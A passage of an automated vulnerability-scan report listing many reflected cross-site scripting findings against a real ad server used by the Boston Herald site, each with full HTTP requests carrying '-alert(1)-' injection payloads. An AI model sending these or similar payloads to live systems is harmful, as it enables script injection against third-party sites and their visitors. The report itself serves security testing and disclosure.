GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?1e60f'-alert(1)-'5ce6f5d2b63 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

4.25. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f781'-alert(1)-'4331bbafcf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald7f781'-alert(1)-'4331bbafcf8/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.26. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e706b'-alert(1)-'511fd1c4838 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ente706b'-alert(1)-'511fd1c4838;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.27. http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6398d'-alert(1)-'eda95b2ec1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?&6398d'-alert(1)-'eda95b2ec1b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.28. http://a.collective-media.net/adj/q1.bosherald/be_ent [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116e0'-alert(1)-'9df7232d930 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?116e0'-alert(1)-'9df7232d930 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.29. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc375'-alert(1)-'1c213697142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosheraldbc375'-alert(1)-'1c213697142/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.30. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4bd'-alert(1)-'a4282fd2012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ent_fr9c4bd'-alert(1)-'a4282fd2012;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.31. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55cd8'-alert(1)-'c6144a53fa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?&55cd8'-alert(1)-'c6144a53fa1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.32. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/be_ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05fc'-alert(1)-'9211df7f8cc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?c05fc'-alert(1)-'9211df7f8cc HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.33. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 654f4'-alert(1)-'850b1958677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald654f4'-alert(1)-'850b1958677/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.34. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cab70'-alert(1)-'8ffc3938199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/entcab70'-alert(1)-'8ffc3938199;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.35. http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 657e3'-alert(1)-'1fd645b8ca3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?&657e3'-alert(1)-'1fd645b8ca3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.36. http://a.collective-media.net/adj/q1.bosherald/ent [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f510'-alert(1)-'cca529e904d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=395221226?7f510'-alert(1)-'cca529e904d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.37. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9722d'-alert(1)-'1ce6f168cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald9722d'-alert(1)-'1ce6f168cb/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.38. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d8b5'-alert(1)-'bb4b3c0ab17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/ent_fr8d8b5'-alert(1)-'bb4b3c0ab17;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.39. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45fdb'-alert(1)-'f0e9ee952a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?&45fdb'-alert(1)-'f0e9ee952a7=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.40. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79143'-alert(1)-'f2c049340a8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797?79143'-alert(1)-'f2c049340a8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.41. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 664cf'-alert(1)-'481295f49c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/uol.collective664cf'-alert(1)-'481295f49c3/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
